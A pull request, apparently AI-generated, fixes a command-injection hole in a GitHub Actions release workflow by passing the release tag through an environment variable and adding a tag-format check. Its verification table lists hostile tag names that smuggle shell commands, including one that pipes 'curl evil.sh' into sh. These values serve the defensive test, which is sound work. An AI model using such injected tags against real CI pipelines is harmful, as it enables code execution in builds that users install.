### PR TITLE
fix: pass the release tag through env instead of the build command line

### DIFF
--- a/.github/workflows/release.yml
+++ b/.github/workflows/release.yml
@@ -12,6 +12,18 @@ jobs:
       contents: read
 
     steps:
+      # Fail before anything consumes the tag name. install.sh enforces the same
+      # shape on the download side, so a tag that cannot pass here would produce
+      # a release the installer refuses anyway.
+      - name: Validate tag name
+        env:
+          VERSION: ${{ github.ref_name }}
+        run: |
+          if [[ ! "$VERSION" =~ ^v[0-9]+\.[0-9]+\.[0-9]+([.-][0-9A-Za-z.-]+)?$ ]]; then
+            echo "::error::Refusing to release tag '$VERSION'; expected vMAJOR.MINOR.PATCH[-suffix]"
+            exit 1
+          fi
+
       - uses: actions/checkout@fbc6f3992d24b796d5a048ff273f7fcc4a7b6c09 # v5
 
       - uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4.4.0
@@ -79,7 +91,8 @@ jobs:
           GOOS: ${{ matrix.goos }}
           GOARCH: ${{ matrix.goarch }}
           CGO_ENABLED: 0
-        run: go build -trimpath -buildvcs=false -ldflags="-s -w -X main.appVersion=${{ github.ref_name }}" -o meridian-${{ matrix.suffix }} .
+          VERSION: ${{ github.ref_name }}
+        run: go build -trimpath -buildvcs=false -ldflags="-s -w -X main.appVersion=$VERSION" -o meridian-${{ matrix.suffix }} .
 
       - uses: actions/upload-artifact@043fb46d1a93c77aae656e7c1c64a875d1fc6a0a # v7.0.1
         with:


### PR DESCRIPTION
## 问题

`release.yml:82` 把 `${{ github.ref_name }}` 直接展开进构建步骤的 shell 命令行：

```yaml
run: go build ... -ldflags="-s -w -X main.appVersion=${{ github.ref_name }}" -o meridian-${{ matrix.suffix }} .
```

Actions 的 `${{ }}` 是在 shell 看到命令**之前**做文本替换的，所以一个精心构造的 tag 名会作为 shell 代码执行——而且是在**生产用户下载安装的那些二进制的构建作业里**执行。

## 改动

同一个文件里的 `docker` job 其实已经做对了：`release.yml:136-137` 通过 `build-args` 传 `VERSION`，`Dockerfile:10` 以 `${VERSION}` 消费，这是 shell 参数展开，bash 不会对展开结果二次解析。build 步骤本来就有 `env:` 块，所以照搬即可：

```yaml
        env:
          GOOS: ${{ matrix.goos }}
          GOARCH: ${{ matrix.goarch }}
          CGO_ENABLED: 0
          VERSION: ${{ github.ref_name }}
        run: go build ... -ldflags="-s -w -X main.appVersion=$VERSION" ...
```

另外在 `verify` 作业的**第一步**加了 tag 格式校验。`build`、`release`、`docker` 都 `needs: verify`，所以这是唯一的收口点。正则与 `install.sh:141` 的 `valid_version` 完全一致，因此校验不过的 tag 本来也会被安装器拒绝下载。

## 验证

正则行为（本地实测）：

| 结果 | tag |
|------|-----|
| 接受 | `v1.5.1` |
| 接受 | `v1.5.1-beta.2` |
| 接受 | `v10.0.0` |
| 拒绝 | `v1.5` |
| 拒绝 | `1.5.1` |
| 拒绝 | `v1.5.1;curl evil.sh\|sh` |
| 拒绝 | `v1.5.1$(id)` |
| 拒绝 | `v1.5.1 && whoami` |

同时验证了即使跳过校验，env 形式本身也是惰性的：把 `v1.5.1;touch /tmp/PWNED` 作为 `$VERSION` 展开后只是变成 ldflags 的字面值，没有任何命令被执行。

三个 workflow 文件均通过 YAML 解析校验。

改完之后，**没有任何 `github.*` 上下文值会到达 `run:` 命令行**；那里仅剩的插值是 `${{ matrix.suffix }}`，它来自 workflow 自身硬编码的 matrix。（`release.yml:143/150/153` 的插值位于 action 的 `with:` 输入中，不经过 shell。）

## 影响评估

触发需要 tag 推送权限，在多数仓库里这已经是维护者级信任，所以严重性是 low 而非 high。真正的风险敞口在于持有 `contents:write` 但没有 `workflows:write` 的细粒度 token、bot 或 GitHub App——它们能推 tag 却不能改 workflow，因此本来不该获得在发布作业里执行代码的能力。

## 说明

本分支通过 GitHub Git Data API 创建（本机到 github.com:443 的 git 传输不通，但 API 可用）。上传的 blob SHA `cc5fb70f27adbadb6ecfe1f40b4dacf362410d1e` 与本地 git blob SHA 一致，可确认内容逐字节相同、行尾未被改动（diff 为 +14/-1）。

🤖 Generated with [Claude Code](https://claude.com/claude-code)